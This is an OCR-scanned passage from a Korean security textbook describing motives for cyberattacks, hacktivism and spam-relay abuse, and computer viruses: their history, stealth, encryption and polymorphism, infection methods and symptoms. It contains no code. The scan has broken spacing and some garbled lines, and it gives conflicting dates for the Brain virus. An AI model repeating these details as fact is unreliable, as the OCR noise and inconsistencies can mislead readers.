쟁자가 그 회 사가 가까운 장래 에 어 떤 제 품을 내 놓는가를 안다면 그 경 쟁 자는 보다 인기 
있는 제품으로 시장에서 그 회사를 파산시킬수 있다. 

금융정보도난도 매우 위험한 공격 이 다. 경쟁자는 회사의 완전한 회계내용을 알게 되 
며 시장에서 부당한 우세를 차지하게 된다. 이리한 부당한 우세는 그 회사의 재정형편과 수 
입원천을 아는데 있다. 

실례로 경쟁자의 망에 침투하여 그 회사의 자산원천을 보여주는 회계문건을 훔쳐낸 한 
콤퓨터상담회사에 대하여 보기로 하자. 공격자는 특히 자산의 60%이상이 팍스기계，인쇄 
기，복사기의 판매로부터 생긴다는데 관심을 돌렸다. 이 정보를 알고 도적은 고객싸이트 
에 가서 말하였다. 〈〈당신은 자기의 콤퓨터망때문에 X 회사에 의존하려고 하는가? 그 회 
사는 주로 사무기계회사이고 그들의 기 업은 팍스나 복사기를 팔고있다.》이 리 한 방법 으 
로 그는 다른 많은 고객들에 대 해서 도 승리하게 되 였 다. 

때 로는 공격 자가 리 익을 위하여 무엇을 제거하지 않아도 되는 때 가 있다. 

실례로 한 사람이 웨브싸이트를 통하여 판매를 실현하는 한 상업회사에서 일한다고 하 
자. 그 사람은 자기의 목록체계를 가지고있고 고객은 안전한 형식으로 주문을 할수 있다. 
그는 자기의 특정의 시장분야에 대하여 최저가격을 준비하고있다. 

이제 한 경쟁 자가 있는데 그의 가격은 약간 높다고 가정 하자. 만일 경쟁 자가 그의 웨 
브싸이트를 기본련결로부터 허용중지시킨다면 그것은 그 경쟁자의 기업에 도움이 될것이 
다. 그의 웨브싸이트에 도달할수 없는 고객들은 대신에 경쟁자의것을 조사해보게 될것이 
다. 고객들은 가격을 비교할수 없으므로 경쟁자의 싸이트에 제품을 주문하게 될것 이 다. 

실제적인 도난은 일어나지 않았지만 이러한 봉사거절은 직접적으로 자산을 잃게 한다. 
이리한 형태의 공격은 립증하기 어려울뿐아니라 량적으로 취급하기는 더 어렵다. 웨브싸 
이트가 8시간동안 단절되여있다면 얼마나 많은 판매량이 잃어졌는지 알수 있는가? 

이처럼 얼마나 경쟁자의 공격을 당하기 쉬운가 하는것은 그의 기업이 얼마나 경쟁적 
인가 하는것과 직접 관계된다. 

2) 호전적 인 공격 

만일 어떤 회사가 론쟁 이 많은것으로 간주될수 있다면 그 회사는 다른 견해를 가지는 
사람들로부터 침 해당하기 쉽다. 

실례로 의학연구에 대한 정보를 출판하는 한 회사의 사건을 보기로 하자. 그 회사의 웨 
브싸이 트에 는 류산에 대 한 자료들이 들어있었는데 그 싸이 트를 검 색하던 한 사람이 웨 브 
봉사기관리자에게 전자우편으로 알리기를 그 싸이트의 일부 자료들이 그 회사가 의도하는 
것들이 아니 라고 하였다. 관리 자는 류산에 대 하여 서술한 모든 폐지들이 류산을 
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내용들로 교체된것을 발견하였다. 

이 러한 공격은 회색구역 에 속하는것 으로써 정보를 도난당하지는 않았으므로 공격자를 
기소하기는 어 려울것 이 다. 

높은 급의 보안침해는 큰 보도거리가 되고 이것은 여러가지 목적으로 악용되고있다. 그 
첫 형태는 싸이버세계에서 군사적 또는 폭력적투쟁을 하고있는 실지로 호전적인 해커 이다. 

여기 에 4가지의 잘 알려진 실례들이 있다. 

■ 1998년 봄에 많은 관측자들은 파키스탄과 인디아가 무력적위협으로서 핵무기를 시 
험하고 언론전에 착수한것을 보았다. 이때 파키스탄과 인디아의 해커들은 상대방의 웨브 
싸이트들에 대 한 공격을 서 로 개시하였다. 

■ 1999년 봄에 나토가 쎄 르비 아를 폭격 하는 기 간 쎄 르비 아와 알바니 아의 해 커 들은 서 
로 상대 방의 싸이 트들에 침 입하였 다. 

■ 2000년에 이스라엘의 정부당국자가 팔레스리 나의 성지를 방문한 후에 발생한 격 
렬 한 실제 적 인 적 대 행 위 들을 방불케 하는 싸이 버 전쟁 이 팔레 스리 나와 이 스라엘의 해커 들(두 
집단은 대체로 미국에 있었다.)사이에서 벌어졌다. 

■ 대 만과 중국의 해커 들은 낮은 수준에서 여 러해동안 싸이버공간에서 서 로 상대 방을 
헐뜯고 깎아내리였다. 어느쪽이나 다 대만섬에 대한 합법적 인 주장을 가지고있었다. 

다른 형 태 는 보통 욕심 이 나 호전적 인것 과는 다른것 들인데 흔히〈〈 해 커 주의 자》라고 한 
다. 이 들은 봉사를 중지 시키 고 웨 브싸이 트를 헐 뜯으며 또는 자기 들의 주장에 주의 를 돌리 
게 할 목적을 가지고 체계들을 공격한다. 

최근의 실례들을 보면 다음과 같다. 

■ 2000년 6월에 S 11 이라는 오스트랄리아의 한 집단이 Nike . com 을 가로채서 Nike 
로 가려 던 방문자들을 S 11 의 반 Nike 싸이트에 로 보내 였 다. 

■ 1999년의 세 계 무역 기 구회 의 기 간에 영 국에 있는 전자히 피 라는 한 집단이 WTO 의 싸 
이트를 일시 마비시켰다. 

3) 높은 급의 공격 

잘 알려져 있거 나 대중의 눈에 자주 보이는 기 관들은 그저 눈에 띄 인다는것으로 하여 공 
격 의 대 상으로 될수 있다. 해커 가 되 보려 고 하는 사람은 성 과적 인 공격 이 자기 의 이 름을 높 
여 주리 라는 희 망을 가지 고 이 름있는 싸이 트에 침 입하려 할수 있 다. 지난 몇 년동안 발생한 
높은 급의 공격의 실례들을 들어보자. 

2000년 2월 에 가장 높은 급의 인 터네 트관련회 사들중 일부가 봉사거 부공격 을 받았다. 
그중에는 Amazon . com , Buy . com , CNN . com , eBay , ExTrade , Yahoo !， 그리고 ZDNet 
가 들어있 다. 

미^크로쏘프트회사는 2000년 10월에 해커들이 여러주동안 자기들의 싸이트에 침입 
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하였다고 발표하였다. 

회사나 기관이 높은 급인가 아닌가를 결정하기는 어 려울수 있다. 대부분의 조직들은 인 
터네트에서의 자기들의 위상이나 존재를 흔히 과대평가한다. 회사가 다국적기업이 아닌 이 
상 또는 싸이 트가 매 일매 일의 웨 브충돌들을 셈세 기하지 않는 이 상 그 싸이 트는 아마 악명 
을 높이 기 위 해 공격하는 그러한 목표는 아닐것 이 다. 

가장 치명적 인 공격형 태는 자기 령역의 우편체계 가 쓰레기우편중계기 로 리 용되는것 이 
다. 쓰레 기 우편 ( spam ) 이 란 무차별적 인 광고배 포를 의 미 한다. 쓰레 기 우편은 어 떤 제 품이 
나 봉사에 대 한 관심 을 불러 일 으키 기 위하여 무차별 적 으로 광고들을 배 포한다. 쓰레 기 우 
편으로 하나의 광고를 발송하면 그것은 수천개의 전자우편주소들과 우편목록들에 도달하 
게 된다. 쓰레 기 우편이 어 떤 우편체 계 를 쓰레 기우편중계 기 로 리용하면 그 우편체 계 는 이 모 
든 통보문들을 배달하는 호스트로 된다. 

그 결과는 봉사의 거부이다. 그 우편봉사기가 이 쓰레기우편우편들을 처리하는데 시 
간을 다 보내 므로 자기 의 령 역 ( domain ) 에 서 의 합법 적 인 우편물들을 처 리 할수 없게 된다. 

가장 현대적인 우편체계는 지금 반쓰레기우편설정기능을 가지고있다. 이 설정은 쓰 
레기우편통보문을 받는것을 막지는 않으나 그 체계가 쓰레기우편중계기로 리용되지 못 
하게 한다. 

보복을 두려워하는 대 부분의 쓰레 기우편사용자들은 자기 것 이 아니 라 남의 우편체 계 를 
리용하려 한다. 전형 적 인 쓰레 기우편사용자는 실제 적 인 귀 환주소를 숨김 으로써 그 통보문 
을 추적하려 고하는 사람이 그것 을 다른 령역 에서 배 포하는것 으로 알게 한다. 쓰레 기우편 
은 많은 사람들을 격분시키며 그들은 우편폭탄이나 봉사거부공격으로서 보복조치를 취하 
게 된다. 

이러한 반공격은 그 기업에 인차 파괴적인 결과를 가져다 줄수 있다. 실례로 한 작은 
망제품제작회사에서 인터네트에 접속된 후에 한 적극적인 판매원이 망에 련결된 매 우편 
목록과 새소식그롭들에 대 량우편을 보낼 좋은 생각을 한다. 

우편에서 는 아주 적 은 응답이 나타나는데 그 판매 원이 희 망했던 형 태 에서 는 그렇 지 않 
았다. 몇시간내로 수만개의 통보문들이 그 령역에로 배포되기를 시도하였다. 우편이 너무 
많아서 우편봉사기 와 우편중계 기 의 디 스크공간이 넘 쳐나게 되 였 다. 수천개 의 통보문속에 
서 어느것이 합법적 인것이고 어느것이 공격을 위한것인지 결정하는것이 불가능하게 되였 
다. 결과로 모든 내부우편들은 쫓겨나게 되 였고 우편중계 기는 공격 이 가라앉을 때까지 약 
한주일동안 정지되게 되였다. 

이 특수한 공격은 한 종업 원의 근시 안적생각에 의한것 이지 만 체계를 통하여 경 로설정 
된 외부적쓰레기우편은 같은 현상과 비용손실을 일으킬수 있다. 
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제5절. 콤퓨터비루스 

2.5.1. 콤퓨터비 루스의 개 념 

콤퓨터 비루스 (Computer Virus ) 는 를퓨터 에서 실행 되는 일반적 인 프로그람이 다. 그 
러 나 콤퓨터 비 루스는 일 반적 인 프로그람과 달리 콤퓨터 의 정 상동작을 방해 하거 나 저 장된 자 
료를 파괴하는 행 동을 하기 때 문에 악성프로그람 (Malicious Program ) 또는 악성쏘프트웨 
어 (Malicious Software , Maliware ) 라고 부르기 도 한다. 

《 비 루스》라는 말이 붙게 된 리 유는 콤퓨터 비 루스가 마치 생 물학적 인 비 루스와 같이 자 
기 자신을 복제 하여 다른 콤퓨터 에 전염 되 는 특성 을 가지 고있기 때 문이 다. 콤퓨터 비 루스의 크 
기 가 일반적 으로 굉 장히 작기때 문에 프로그람이 라는 말보다는 코드라는 말을 사용하기 도 한 
다. 여 기서는 일반적 으로 사용하는 콤퓨터비루스타는 용어를 사용한다. 

콤퓨터비 루스의 력 사는 그리 오래 된것 은 아니 다. 그러 나 일 반적 인 프로그람이 현재 의 
콤퓨터비루스와 같은 문제를 일으킬것이라는 예견은 오래전에 있었다. 폰 노이만 ( J . Von 
Neumann ) 은 1949년 자기 의 론문에 서 《 콤퓨터 프로그람은 자신을 복제 함으로써 증식 할 
수 있 다.》라는 내 용을 발표함으로써 이 미 콤퓨터 비 루스에 대 한 문제 를 예 측하였 다. 

2.5.2. 콤퓨터비 루스의 력 사 

최 초의 를퓨터 비 루스는 1988년 파키 스탄의 프로그람을 판매 하는 가게 에 서 자신들이 제 
작한 프로그람의 불법 복제를 막기 위 해 제 작된 브레 인비루스 (Brain Vimse ) 이 다. 이것은 
계 획적 으로 제 작되 여 류포되 였으며 일반사용자들에게 많은 피 해를 입혔다. 콤퓨터비루스 
는 특정한 대상을 위해 제작되기도 하지만 한번 실행되면 일반적으로 다수를 대상으로 증 
식 되 기 때 문에 그 피 해 규모는 상상을 초월 한다. 

1990년대 초에 들어서면서 콤퓨터비루스 제작자들이 원천을 공개하고 비루스와 관련 
된 서적 이 출판되기 시 작하면서 콤퓨터비루스는 급속도로 증가하기 시 작하였다. 1990년 
대 중엽 전문가들에 의 해 제 작된 콤퓨터 비 루스 제 작도구가 등장하고 콤퓨터 비 루스제 작을 안 
내 하는 출판물이 등장하게 되 면서 일 반사용자들도 쉽 게 비 루스를 만들수 있게 되 였 다. 비 
루스제 작도구를 리용하면 몇 가지 피 해 증상을 지 정하는것 만으로도 손쉽 게 제 작할수 있 다. 

최 근에 는 콤퓨터비 루스로 하여 발생하는 문제 는 단순히 규모의 증가만은 아니 다. 특 
정 콤퓨터비 루스가 발견되 면 이 와 류사한 변종비 루스가 나타나며 감염 시키 는 방법 도 다양 
해 진다는것 이 다. 

를퓨터비루스는 쏘프트웨 어에 이즈，쓰레 기프로그람，전자페스트 등의 별명 으로 불리 
우며 자기 복제 기 능을 다른 프로그람들에 기 생 하는 비 도덕 적 인 활동을 한다. 

病 _ 
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2.5.3. 콤퓨터비 루스의 발전 

콤퓨터비루스타고 해도 모두 다 같은것은 절대로 아니다. 정보기술이 급속히 발전해 
왔듯이 콤퓨터 비루스도 그 특성과 모습을 계속 바꾸어 왔다. 콤퓨터 비루스에도 세대 차이 가 
분명히 존재 한다. 새 세대 콤퓨터 비루스는 어떤 모습인가? 그러 나 다양성 에도 불구하고 공 
통된 특징도 있을것인가? 콤퓨터비루스의 종류와 앞으로의 전망에 대해서 고찰해보자. 

1) 비루스의 발전단계 

콤퓨터 비루스는 브레 인비루스가 처음으로 발견되 였던 때로부터 다양한 형태로 발전하 
였다. 콤퓨터비루스의 발전단계를 살펴보면 어떤 형태로 발전하였는지 리해할수 있다. 를 
퓨터비루스의 발전단계는 크게 다섯단계로 나눌수 있다. 여기서 세대구분은 콤퓨터비루스 
의 발전단계이 지 시 간적 인 발전 단계 를 의 미 하지 는 않는다. 례 를 들어 브레 인비 루스는 아 
주 초기에 발견된 콤퓨터비루스이지만 은페기법을 사용하고있기때문에 제3세대 비루스로 
분류한다. 지 금의 콤퓨터비 루스는 제1세 대 비 루스부터 제 5세 대 비 루스까지 공존하는 상 
태 이 다. 

1987년 10월 미 국 델 라웨 어 대 학 (Delaware University ) 에 서 처 음 발견한 브레 인 비 루 
스는 파키 스탄사람인 당시 26살의 엠 자드 알비 (Amjad Farooq Alvi ) 와 19살의 배시 트 알 
비 (Basit Farooq Alvi ) 가 제 작한것 이 다. 이들은 자신이 만든 프로그람이 계속 불법복사 
되 는것 을 막기 위하여 이 비 루스를 만들어 1986년 초부터 류포시켰 다. 


一 제 1세 대 : 원시 형 비 루스 (Primitive Virus ) 

가장 원시적인 형태를 가지고있으며 실력이 그다지 높지 않은 초보프로그람작성자들 
이 만든것으로서 원천코드가 공개되 여 있고 프로그람의 구조가 단순하여 분석하기가 매우 쉽 
다. 프로그람내 부를 분석해보면 코드가 암호화되 여있지 않기 때 문에 방역 이 쉽다. 

대표적인 실례를 보면 Stoned 비루스， Jerusalem 비루스 등이 있다. 

一 제 2세 대 : 암호화비 루스 (Encryption Virus ) 

어느 정도 실력을 가전 프로그람작성자들이 만들었으며 왁찐프로그람이 진단할수 없 
게 하기 위하여 비루스프로그람의 일부 또는 대부분을 쉽게 해석 되지 않도륵 코드의 문자 
렬부분을 암호화하였 다. 그러 나 실행 이 시 작되는 부분에 존재하는 암호는 해 독하는 방법 
이 항상 일정하기때문에 어 렵지 않게 퇴 치할수 있다. 

또한 외부기 억 장치에서 는 확인하기 가 쉽지 않지 만 주기억기 에서 확인하기 쉽 게 검 색 
되 는 특징 을 가지 고있기 때 문에 왁찐개 발이 비 교적 쉽다. 

대표적인 실례를 보면 Cascade 비루스， Slow 비루스 등이 있다. 


— 제 3세 대 : 은폐 형 비 루스 (Stealth Virus ) 

주로 주기 억 기 상주형 비 루스가 3세 대 에 속하며 은페 형 비 루스로서 감염 여 부를 숨기 기 위 
하여 원래 정 보를 조작하여 출력하는 특징 을 가지 고있 다. 
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주기억기에 상주하면서 비루스에 의해 감염된 파일의 길이가 증가하지 않은것처럼 보 
이게 하고 왁찐프로그람이 감염된 부분을 읽으러고 하면 감염되기 전의 내용을 보여중으 
로써 비루스가 존재하지 않는것처럼 왁찐프로그람이나 사용자를 속이는것 이다. 이 비루스 
를 제거하기 위해서는 주기억기를 먼저 검사하여 은페기능을 제거하면 쉽게 진단할수 있다. 

대 표적 인 실 례 를 보면 Brain 비 루스， Joshi 비 루스， Hide - and - seek 비 루스， Next 비 루 
스가 있다. 

一 제 4세 대 : 갑옷형 비 루스 (Armour Virus ) 

다형성비루스로서 가장 복잡한 형태의 비루스이며 진단방법을 구성 하기가 매우 어 렵 
다. 콤퓨터비 루스제작자들은 왁찐프로그람이 아닌 왁찐프로그람작성 자를 공격 목표로 삼고 
여 러 단계의 암호화와 고도의 자체수정수법 을 동원하여 왁찐프로그람작성 자가 비루스를 분 
석 하고 왁찐을 제 작하는 과정 을 어 렵게 만들었다. 마치 갑옷처 럼 위 장하고 공격할수 있는 
특징을 가진 다. 

이 비루스는 암호화비루스의 일종이지만 단순한 암호화비루스와는 달리 암호를 해독 
하는 부분조차도 감염될 때마다 달라지는 비루스이 다. 이 비루스들중에는 한개의 비루스 
가 100만개 이상의 변종을 만드는 경우도 있어 왁찐프로그람작성자를 혼란에 빠뜨릴수 있 
다. 현재 로서 는 갑옷형 비 루스의 종류가 많지 않지 만 앞으로 제 작될 가능성 은 매 우 높다. 그 
러 나 은폐 형비 루스와 마찬가지 로 이 비 루스도 진 단이 나 치 료가 불가능한것 은 아니 며 실제 
로 대부분의 왁찐프로그람을 사용하면 진단 및 치료가 가능하다. 

대표적인 실례를 보면 Whale 비루스， Natas 비루스， Co 伴 ee - shop 비루스 등이 있다. 

一 제5세 대 : 마크로비 루스 (Macro Virus ) 

최근에 가장 큰 문제를 일으키고있으며 전세계적으로 급속히 확산되고있는 새로운 형 
태 의 비 루스로서 Microsoft Office 프로그람의 마크로기 능을 리용한 를퓨터비 루스이 다. 지 
금까지 발견된 마크로비 루스는 크게 Microsoft Word 와 Excel 을 감염 시키 는 2가지 종류가 
있으며 1997년까지 무려 2000여종이상 발견된것으로 알려져있다. 앞으로는 기존의 1~4 
세대의 비 루스보다도 마크로비 루스가 급격 히 증가할것 으로 예 상된다. 

마크로비루스는 Microsoft Word 와 Excel 기 타 다른 프로그람들에서 사용되는 비루스 
로서 여러 단계에 걸쳐 사용되는 명령들을 하나의 명령으로 모아서 실행하거나 건반의 입 
력건을 설정하여 한번의 입력으로 여러개의 명령을 실행시킨다. 

최근에는 CIH , Loveletter , Insta 등의 32 bit Windows 전용비루스가 등장하고 
prettypark , mypics 등의 웜과 각종 트로이목마코드가 나타나는것과 동시에 LINUX 용비 
루스도 계속 등장하고있기때문에 왁찐개발이 어려워지고있는 상태이다 . 

2) 비루스의 분류 


콤퓨터비루스를 분류하는 방법은 매 우 다양하다. 여 기서는 일반적 인 방법 인 감염위 치 
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— 감염위 치 에 따른 분류 


^ 부트 ( Boot ) 비루스 

부트분구를 감염시키는 비루스이 다. 

처 음에 콤퓨터 를 기 동시키 면 주기 억 기 로 올라오는 부트분구 (Boot Sector ) 라는 부분이 
있 다. 부트분구는 조작체 계 를 주기 억 장치 로 적 재하는 일 을 하는 부트기 록부의 정 보를 보 
관하고있다. 따라서 콤퓨터에 조작체계가 동작할 때 가장 먼저 읽 어들이 고 모든 명령이 반 
드시 통과하는 지점 이므로 이 부트분구가 감염되면 콤퓨터체계 가 기동될 때마다 콤퓨터비 
루스가 동작하게 된다. 

대표적인 실례를 보면 Brain 비루스， LBC 비루스， Pingpong 비루스가 있다. 


^ 파일 ( File ) 비 루스 

실행파일을 감염시키는 비루스이 다. 

파일비루스는 실행 가능한 파일 인 EXE , COM 과 주변장치 구동파일 인 SYS 를 감염대 
상으로 한다. 실행가능한 파일들은 주기 억기 에서 실행되기때문에 비루스에 감염될 경우 다 
른 프로그람들을 쉽게 감염시 킬수 있다. 파일비루스는 실행할수 없는 자료파일은 감염시 
키지 않는다. 

파일비루스는 감염시키는 형태에 따라 여러가지로 분류할수 있다. 

대표적인 실례를 보면 Jerusalem 비루스， Happy _ New_Year 비루스가 있다. 

^ 부트/파일 ( Boot / File ) 비 루스 

부트령역 과 실 행파일 을 모두 감염 시키 는 비 루스이 다. 

이 비루스는 그 크기 가 매우 크며 파괴적 인 특성을 가지 고있다. 감염된 파일을 실행 
시키면 기억기와 부트，실행파일 모두를 동시에 감염시키거나 부트파일만 감염시키고 재 
기동을 하면 실행파일까지 감염시키기도 한다. 전염성이 빠르고 피해규모가 큰 편이여서 많 
은 주의 를 돌려야 한다. 

대표적인 실례를 보면 Ghost 비루스， Liberty 비루스가 있다. 


^ 마크로 ( Macro ) 비루스 

Microsoft Office 프로그람의 마크로기능만을 감염시키는 비루스이 다. 

이 비루스는 Office 를 사용하지 않는 사람은 절대 로 걸릴 위험 이 없다. 감염대상에는 
Microsoft Word 의 문서 파일인 DOC , Dot , Microsoft Excel 표파일 인 XLS 등이 속한다. 
마크로비루스는 지금까지 살펴본 비루스와는 달리 조작체계 에 영 향을 미치지 않는다. 다 
만 Microsoft Office 프로그람이 실행된다면 조작체계에 관계없이 감염시킨다. 만들기가 쉽 
기 때 문에 변형 된 비 루스가 많이 생 기 고있으며 실 행파일 이 아닌 일 반문서 들을 감염 시 킨다. 
사용자가 만들지 않은 마크로가 만들어져있는 경우에 비루스의 존재여부에 대하여 의심해 
야 한다. 


하 
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一 감염 방법 에 따르는 분류 
^ 기 생 형 ( Parasitic ) 비 루스 

기생형비루스는 아래와 같이 정상적 인 프로그람의 앞뒤 에 붙어서 활동한다. 그리 고 활 
동하는 위치에 따라 전위형과 후위형으로 나눌수 있다. 외형적으로 보면 파일의 크기가 증 
가하게 된다. 그러나 정상적인 프로그람은 남아있기때문에 실행에는 전혀 이상이 없다. 따 
라서 파일의 크기를 일일이 관찰하지 않는 한 쉽게 알수 없다. 


기생형전위비루스 
기 생 형 후위 비 루스 


비루스 

정상적 인 프로그람 


정상적인 프로그람 

비루스 


cr 겹 쳐 쓰기 형 ( Overwriting ) 비 루스 

정상적인 프로그람의 일부를 비루스가 겹쳐쓴다. 외형적으로 보면 파일크기의 변화가 
없지 만 정상적 인 프로그람이 잘려나간 상태 이 기때 문에 실행할 때 정 상적 으로 동작하지 않 
을수도 있다. CIH 비루스가 대표적 이 다. 


겹 쳐 쓰기 형비 루스감염 전 정 상적 인 프로그람 


감염후 정 상 비 루스 프로그람 


^ 산란형 ( Spawning ) 비 루스 

확장자가 EXE 인 실행파일을 바로 감염하지 않고 .EXE 파일의 이름과 동일한 형태의 
COM 파일을 만들어 그 안에 비루스프로그람을 넣는다. 동일한 이름의 COM 파일과 EXE 
파일 이 존재 하면 COM 파일 이 먼저 실행 하게 되 는데 그 결과 실제 비 루스가 감염 시 킨 COM 
파일이 먼저 실행하므로 피해를 주게 된다. 


^ 련결형 ( Linking ) 비 루스 

련결형비루스는 프로그람을 직접 감염시키지 않고 정상적인 프로그람의 시작위치를 비 
루스프로그람의 시 작위 치 로 바꾸어 놓는다. 따라서 프로그람을 실행시키 면 비 루스는 시 작 
위치로 이동하여 실행되고 정상적인 프로그람도 실행된다. 실지로는 비루스가 실행되지만 
정상적 인 프로그람이 동시에 수행되므로 사용자가 눈치채지 못할수 있다. 


ᄍ어 ui 추스는 omi 동착하는가? 

지금까지 살펴본 다양한 비루스의 형태들을 통해 콤퓨터체계의 특정한 부분이나 파일 
등에 상주하거나 실행된다는것을 알수 있다. 

I 면 실지로 비루스가 감염되는 과정을 고찰해보자. 


0 
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2.5.4. 콤퓨터비루스의 동작원리 

일반적인 콤퓨터비루스는 감염된 파일이나 체계는 다시 감염시키지 않는다. 



그림 2-3. 일반적인 콤퓨터비루스의 동작원리 

를퓨터비루스의 동작원리는 그림 2-3 과 같다. 그림에서 보면 먼저 콤퓨터비루스는 감 
염시키려고 하는 대상파일들이 실행될 경우 해당 파일들의 감염여부를 조사하게 된다. 해 
당 파일 이 감염되지 않았다면 콤퓨터비루스를 복사한 후 파일을 실행시키 고 감염되 였다면 
곧장 프로그람을 실행시킨다. 

그렇 다면 콤퓨터비루스는 어 떻게 복사되는가? 이것은 비루스의 종류나 조작체계 에 따 
라 감염되는 방법 이 다르다. 


1) 를퓨터비 루스의 감염 
一 감염 경 로 
^ 불법복사 

이 경 우는 프로그람제 작자가 일부로 프로그람내 부에 비 루스를 삽입한것 이 다. 정 상적 
으로 사용하면 콤퓨터 비 루스는 동작하지 않지 만 불법 복사가 이 루어 지 면 프로그람내 부에 있 
던 콤퓨터비루스가 실행되게 된다. 


^콤퓨터통신 

콤퓨터통신을 통하여 필요한 프로그람을 내 리적재받을수 있다. 이 런 경우에는 대부분 
이 무료로 제공되므로 사용자들은 아무 의심없이 사용하게 된다. 

프로그람이 나 자료가 콤퓨터비 루스가 감염된 경 우라면 실행 시키 는것 과 동시 에 콤퓨터 
비 루스에 감염된다. 알아두어 야 할것은 콤퓨터통신망에서 제 공되 는 프로그람이 나 자료는 대 
부분 검증을 거 치지 않는것 이므로 주의를 돌려야 한다는것 이 다. 


4급 
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ᄄ 콤퓨터의 공동사용 

하나의 콤퓨터를 공동으로 사용하는 경우 비루스는 콤퓨터에 감염될수 있기때문에 본 
인만이 비루스에 주의한다고 해서 해결되는 문제가 아니다. 사용하는 모든 사람들이 주의 
하지 않으면 본인도 모르게 콤퓨터가 비루스가 감염되게 된다. 


cr LAN 

망을 통 하여 정보공유가 활발해지면서부터 나타나게된 경로이다 . 콤퓨터비루스중에서 
Win 32/ FunLove . 4099는 망상에 서 공유되 고있는 콤퓨터 만을 감염 대 상으로 한다. LAN 을 
통한 콤퓨터 비루스의 감염 비률이 급속하게 증가하고있 다. 

cr 인터네트 

인 터네 트를 통하여 감염 되 는 가장 대 표적 인 경 우는 전자우편 이 다. 전자우편을 통하여 
콤퓨터비 루스에 감염 된 파일 이 나 웜비 루스를 첨 부시 켜 전송하면 그 파급속도가 대 단히 빠 
르기 때 문에 많이 리용되 고있 다. 또한 기 존의 를퓨터 통신망이 인 터네 트로 통합되 면서 프로 
그람이 나 파일의 내 리적재 를 통하여 전파되 기 도 한다. 

一 감염증상 

이전의 콤퓨터 비루스는 특이한 증상을 통하여 사용자들에게 피 해를 주었다. 그러 나 몇 
가지 비루스들은 감염되여도 증상이 잘 알리지 않는다. 이러한 비루스에 감염된 경우에는 
사용자 몰래 그의 정보를 류출하여 나중에는 더 큰 피해를 줄수 있다. 

다양한 콤퓨터비 루스의 감염 증상에 대 하여 보기 로 하자. 

@ 프로그람의 실행속도가 떠진다. 

비루스는 프로그람의 형태이기때문에 정상적인 프로그람을 실행시킬 때보다는 비루스 
를 같이 실행시켜야 하므로 당연히 나타날수 있는 현상이다. 이때 정상적인 프로그람에 비 
루스프로그람이 삽입되 여 실행속도가 떠지는 경우와 콤퓨터비루스의 감염 으로 실행속도가 
떠 지 는것 은 사용자에 게 불편을 주기 때 문에 콤퓨터비 루스의 일 반적 인 증상으로 알려 져 있 다. 

^ 특별한 리유없이 를퓨터가 정지한다. 

콤퓨터체계에 치명적인 문제가 발생한 경우에 일어나는 현상이다. 모든 경우가 콤퓨 
터비루스에 의한 증상이라고 볼수는 없지 만 대체 로 콤퓨터비루스의 피 해증상으로 나타나 
기도 한다. 

^ 정 상적 인 파일의 크기 와 수정날자가 변경 되 였 다. 

콤퓨터비루스가 기생형 인 경우에 나타나는 현상이 다. 

콤퓨터비루스에 감염되면 정상적 인 파일크기보다 커지게 되며 사용자가 수정하지 않 
았는데 도 비 루스가 감염 된 날자를 기 준으로 수정날자가 변하게 된 다. 
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ᄄ 주기억 기의 크기 가 감소되 였다. 

주기억기에 상주하는 콤퓨터비루스에 감염된 경우에는 항상 주기 억기에서 실행되여야 
하기때문에 정상적 인 동작을 할 때와 비교하여 주기억기의 크기 가 감소하게 된다. 

^ 콤퓨터 에서 사용자가 의도하지 않는 일 이 발생 한다. 

화면에 이상한 그림 이 나 통보가 나타나거 나 화면이 이 그러지는 현상이 나타날수 있다. 
이런 경우에는 실지 콤퓨터체계에 큰 피해가 없는 경우와 이상현상이 일어나는 동안 콤퓨 
터체계가 내부적으로 파괴되는 경우가 있다. 

이 외에도 비루스의 수만큼이나 감염경로와 증상도 다양하다. 

이상과 같이 이 장에서는 해커 및 해킹의 일반적개념과 LINUX 체게를 대상으로 하 
는 실제 적 인 해 킹원천코드를 서 술하였 다. 

또한 콤퓨터비루스의 일반적개념과 종류，그 위험성에 대해서 서술하였다. 
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제 3 장. LINUX 에서 망보안의 구성요소 

이 장에서는 LINUX 에서 실현된 망흐름의 일반적구조와 망보안의 구성요소에 대해서 
구체적으로 고찰한다. 

제1절. LINUX 에서 망통신의 일반적흐■구조 


3.1.1 LINUX 에서 TCP/IP 규약 실현 

통신규약은 계 층구조를 가전다. 그리 고 LINUX 는 매 층을 관리하는 자료구조를 가진 
다. 통신규약의 웃층은 여러 아래층과 련결될수 있다. 

례 를 들어 BSD 소케 트는 사용자가 선택 한 통신규약계 렬 에 따라 INET 층， IPX 층， X 25 
층 등 다양한 아래층과 련결될수 있다. IP 층인 경우에는 사용하려는 망장치에 따라 이써 
네트층， SLIP 층， talking 층， FD 이층 등과 련결될수 있다. 

최 근에 는 ATM 층을 IP 층아래 에 두는 통신규약층도 설계되 였으며 이 경 우에 는 IP 층이 
ATM 층과 자료를 전 달하게 된 다. 결 국 통신규약층을 내 려오면서 다양한 곳으로 조종흐름 
이 분기될수 있다는것을 알수 있다. 

LINUX 는 조종흐름이 다양한 곳으로 분기할수 있 다는 가능성 을 효과적 으로 지 원하 
기 위하여 층사이 에 서 조종이 전 달될 때 자료구조를 리용한 간접호출방법 으로 통신규약 
을 실현하였다. 즉 아래층에서 지원하는 함수를 웃층에서 리용할 때 웃층에서 직접 이 함 
수를 호출하는것 이 아니 라 아래 층이 자기 가 제 공하는 함수의 시 작주소를 특정 자료구조(주 
로 표) 에 등록하고 웃증에 서 는 다만 자료구조에 등록된 함수를 호줄하는 방식 으로 아래 
층의 함수를 간접호출하는 방식 을 실 현 하였 다. 

이 방식 은 마치 파일연산자료구조를 리용하여 장치 구동프로그람의 함수를 호출한것 과 
비슷한 방법 이 다. 

이런 방식으로 실현하면 웃층과 아래층사이에 종속관계가 없어지며 따라서 일부층의 
내 용을 수정하거 나 새 로운 층을 추가할 때 핵 심 부에 서 변경 하기 쉽다. 

웃층은 아래층에 어떤 함수가 어떤 흐름으로 실현되 여 있는지 몰라도 되며 다만 자료 
구조에 등록되여 있는 함수를 호출하기만 하면 아래층으로 자료를 전달할수 있다. 따라서 일 
부층의 내 용을 변경할 때 또는 새 로운 층을 추가할 때 변경 된 층의 웃층이 나 아래 층의 내 
용도 변경할 필요가 없다. 단지 변경된 층의 내용을 자료구조에 등록만 하면 된다. 

앞에서 가장 웃층에 VFS 층이 존재한다는것을 알수 있다. 

LINUX 에서는 소케트가 파일체계대면부를 통해 접근할수 있도륵 실현하였으며 따라 
수경 C 토를 위한 파일 연산도 핵 심 부에 존재한다. 
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한편 매층마다 주요자료구조가 있 으며 이 층에 서 BSD 소케 트의 socket 자료구조， 
